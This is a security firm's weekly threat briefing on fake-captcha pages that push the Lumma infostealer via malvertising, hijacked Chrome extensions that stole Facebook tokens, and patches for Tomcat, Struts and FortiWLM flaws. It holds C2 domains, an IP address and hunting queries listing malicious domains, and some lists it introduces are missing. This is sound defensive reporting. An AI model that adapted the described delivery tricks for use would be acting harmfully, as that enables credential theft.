This week we briefed our clients on how fake captchas are delivering infostealer malware and how some Google Chrome extensions have been compromised.
KEY TAKEAWAYS
Infostealer malware is one of the most prevalent cybersecurity threats individuals and organizations face today. This type of malware is designed to harvest credentials, session cookies, banking and financial data, and more. In October, researchers at Qualys detailed a new method used for delivering the Lumma Infostealer: Fake Captchas.
With this method, users are presented with what looks like a “human verification” page, or Captcha portal. However, the page includes extra “verification steps” that trick the user into opening the Windows Run prompt and pasting in a PowerShell command that downloads and executes the malware (see screenshot below).
New research from Guardio labs details the latest campaign used by Lumma Stealer. The threat actors behind Lumma Stealer are using malvertising (malicious advertising), specifically through a single ad network: Monetag. The malicious links supplied to Monetag for this campaign are “cloaked” behind an ad tracking service called BeMob. This allows the threat actor to bypass Monetag’s safety and reputation filters and deliver the malicious ads.
Guardio’s research also shows that the fake Captcha pages are hosted on large, reputable hosting sites, such as Oracle Cloud and Cloudflare R2. Guardio was able to show that this ad campaign generated over 1 million ad impressions per day across 3000+ publisher sites.
How to Protect Your Organization
The sites hosting these malicious ads are overwhelmingly related to anime and TV/movie streaming sites. These types of webpages should generally never be visited by a work computer. Using a content filter at the web gateway to block these types of “entertainment” and “streaming” sites will limit exposure to these malicious advertisements.
These types of fake Captcha pages should be included in User Awareness training as it is becoming a popular technique for threat actors to deliver malware. Users should never run untrusted commands on their workstations. These permissions can also be disabled for standard users via GPO.
As always, having a fully up-to-date, properly configured EDR solution across all endpoints is an effective defense against this type of malware.
Fig 1. Fake Captcha Page | Source: Qualys
Resources:
https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
https://www.darkreading.com/cyberattacks-data-breaches/trick-captcha-lumma-stealer-malware
https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
Last week, cybersecurity company Cyberhaven disclosed that their Google Chrome extension on the Chrome Web Store was compromised with malicious code. This code targeted identity data and access tokens of Facebook accounts, and communicated to a typo-squatted command and control (C2) domain of cyberhavenext[.]pro.
Over the weekend, sixteen other Chrome extensions have been identified that are suspected of being compromised by the same campaign:
Most of these backdoored Chrome extensions have already been removed from the Chrome Store. However, the malicious extension must be fully removed from the endpoint for the threat to be removed.
The malicious C2 domain cyberhavenext[.]pro resolves to the IP address 149.28.124[.]84. Analysis of this IP shows 16 additional domains registered within the last month. Traffic to any of these sites should be treated as malicious. Below are the PacketWatch queries to hunt for this traffic:
\*.ip:(149.28.124.84)
http.host:(graphqlnetwork.pro OR videodownloadhelper.pro OR yescaptcha.pro OR castorus.info OR bookmarkfc.info OR primusext.pro OR iobit.pro OR uvoice.live OR cyberhavenext.pro OR internxtvpn.pro OR yujaverity.info OR parrottalks.info OR censortracker.pro OR vpncity.live OR wayinai.live OR moonsift.store OR readermodeext.info)
Resources:
https://www.cyberhaven.com/blog/cyberhavens-chrome-extension-security-incident-and-what-were-doing-about-it
https://thehackernews.com/2024/12/16-chrome-extensions-hacked-exposing.html
Vulnerability Roundup
A new race condition vulnerability was disclosed by Apache for their Tomcat web server, tracked as CVE-2024-56337, which can allow for remote code execution (RCE). This new CVE covers additional mitigations that were not included in the initial patch released on December 17, which was tracked as CVE-2024-50379. This vulnerability affects Tomcat servers with the default servlet write enabled (“readonly” initialization parameter set to false) and that are running on case-insensitive file systems.
The issue affects Apache Tomcat 11.0.0-M1 through 11.0.1, 10.1.0-M1 through 10.1.33, and 9.0.0.M1 through 9.0.97. Administrators are urged to patch to versions 11.0.2, 10.1.34, 9.0.98 or higher. These additional changes are also required to mitigate the vulnerability:
Apache released a security advisory detailing a file upload vulnerability in the Apache Struts framework which can lead to path traversal and remote code execution. The vulnerability is tracked as CVE-2024-53677, and affects the following versions:
Upgrade to Apache Struts 6.4.0 or later and migrate to the new file upload mechanism.
https://threatprotect.qualys.com/2024/12/16/apache-struts2-remote-code-execution-vulnerability-cve-2024-53677/
A critical vulnerability in FortiWLM, tracked as CVE-2023-34990, was disclosed by Fortinet last week. This flaw allows unauthenticated attackers to read sensitive files on the device, including the session ID of a target user. This vulnerability can also be combined with CVE-2023-48782, an authenticated command injection flaw, to gain remote code execution in the context of root. The following versions are affected:
|
Version |
Affected |
Solution |
|
FortiWLM 8.6 |
8.6.0 through 8.6.5 |
Upgrade to 8.6.6 or above |
|
FortiWLM 8.5 |
8.5.0 through 8.5.4 |
Upgrade to 8.5.5 or above |
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
Subscribe to be notified of future Reports:
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.